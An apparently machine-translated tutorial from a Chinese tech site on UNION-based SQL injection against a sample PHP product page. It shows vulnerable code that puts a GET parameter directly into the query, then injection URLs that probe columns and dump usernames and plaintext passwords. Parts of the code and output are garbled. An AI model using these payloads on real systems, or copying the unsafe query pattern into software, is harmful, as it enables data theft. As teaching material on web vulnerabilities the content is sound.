Shulou(Shulou.com)05/31 Report--

This article mainly introduces "the complete process of SQL injection of PHP". In the daily operation, I believe that many people have doubts about the complete process of SQL injection of PHP. The editor consulted all kinds of data and sorted out simple and easy-to-use operation methods. I hope it will be helpful to answer the doubts of "the complete process of SQL injection of PHP". Next, please follow the editor to study!

SQL injection is to deceive the server into executing malicious SQL commands by inserting SQL commands into the Web form to submit or enter the query string of domain names or page requests.

First look at the two MYSQL data tables

User record table:

REATE TABLE `php_ user` (

`id`int (11) NOT NULL auto_increment

`username`varchar (20) NOT NULL default''

`password` varchar (20) NOT NULL default''

`userlevel` char (2) NOT NULL default'0'

PRIMARY KEY (`id`)

) TYPE=MyISAM AUTO_INCREMENT=3

INSERT INTO `php_ user`VALUES (1, 'seven',' seven_pwd', '10')

INSERT INTO `php_ user`VALUES (2, 'swons',' swons_pwd','')

Product record list:

CREATE TABLE `php_ product` (

`id`int (11) NOT NULL auto_increment

`name` varchar (100) NOT NULL default''

`price`float NOT NULL default'0'

`img`varchar (200) NOT NULL default''

PRIMARY KEY (`id`)

) TYPE=MyISAM AUTO_INCREMENT=3

INSERT INTO `php_ product` VALUES (1, 'name_1', 12.2,' images/name_1.jpg')

INSERT INTO `php_ product` VALUES (2, 'name_2', 35.25,' images/name_2.jpg')

The following files are used by show_product.php to display a list of products. SQL injection also exploits the SQL statement vulnerability of this file.

$conn = mysql_connect ("localhost", "root", "root")

If (! $conn) {

Echo "database connection error"

Exit

}

If (! mysql_select_db ("phpsql")) {

Echo "error selecting database". Mysql_error ()

Exit

}

$tempID=$_GET ['id']

If ($tempID

Observe this statement: $sql = "SELECT * FROM php_product WHERE id = $tempID"

$tempID is obtained from $_ GET. We can construct the value of this variable to achieve the purpose of SQL injection

Construct the following links respectively:

1. Http://localhost/phpsql/index.php?id=1

Get the following output

SELECT * FROM php_product WHERE id = 1 / / currently executed SQL statement

/ / get the list of product information with ID 1

ID:1

Name:name_1

Price:12.2

Image:images/name_1.jpg

2. Http://localhost/phpsql/index.php?id=1 or 1

Get the output

SELECT * FROM php_product WHERE id = 1 or 1 / / currently executed SQL statement

/ / A total of two product information lists

ID:1

Name:name_1

Price:12.2

Image:images/name_1.jpg

ID:2

Name:name_2

Price:35.25

Image:images/name_2.jpg

Both 1 and 2 get the data list output, which proves that the SQL statement was executed successfully.

Determine the number of datasheet fields

Http://localhost/phpsql/index.php?id=1 union select 1,1,1,1

Get the output

SELECT * FROM php_product WHERE id = 1 union select 1, 1, 1, 1, 1, 1, 1, 1, 1 / / currently executed SQL statement

/ / there are a total of two records. Note that the record of the second one is all 1, which is the result of union select federated query.

ID:1

Name:name_1

Price:12.2

Image:images/name_1.jpg

ID:1

Name:1

Price:1

Image:1

Determine the type of datasheet field

Http://localhost/phpsql/index.php?id=1 union select char 65, char 65

Get the output

SELECT * FROM php_product WHERE id = 1 union select char (65), char (65)

ID:1

Name:name_1

Price:12.2

Image:images/name_1.jpg

ID:0

Name:A

Price:0

Image:A

Note the second record. If the following value is equal to A, this field matches the field type constructed after the union query. At this time behind the union

Is char (65), which represents the string type. After observation. You can find that the types of name fields and image fields are both string types.

Get it done and get what we want:

Http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user

Get the output:

SELECT * FROM php_product WHERE id = 10000 union select 1 # username # 1 # password from php_user

/ / two pieces of user information are output. Name is the user name and image is the user password.

ID:1

Name:seven

Price:1

Image:seven_pwd

ID:1

Name:swons

Price:1

Image:swons_pwd

Note that the purpose of ID=10000 in URL is not to get the product information, but only to get the query results of the later union. More realistic, the value of ID is different.

Union's username and password must be placed in positions 2 and 4. This matches the previous select statement. This is a union query

The characteristics of sentences

Remarks:

This simple injection method is more context-specific. It's actually more complicated than that. But the principle is the same.

At this point, the study of "the complete process of SQL injection into PHP" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.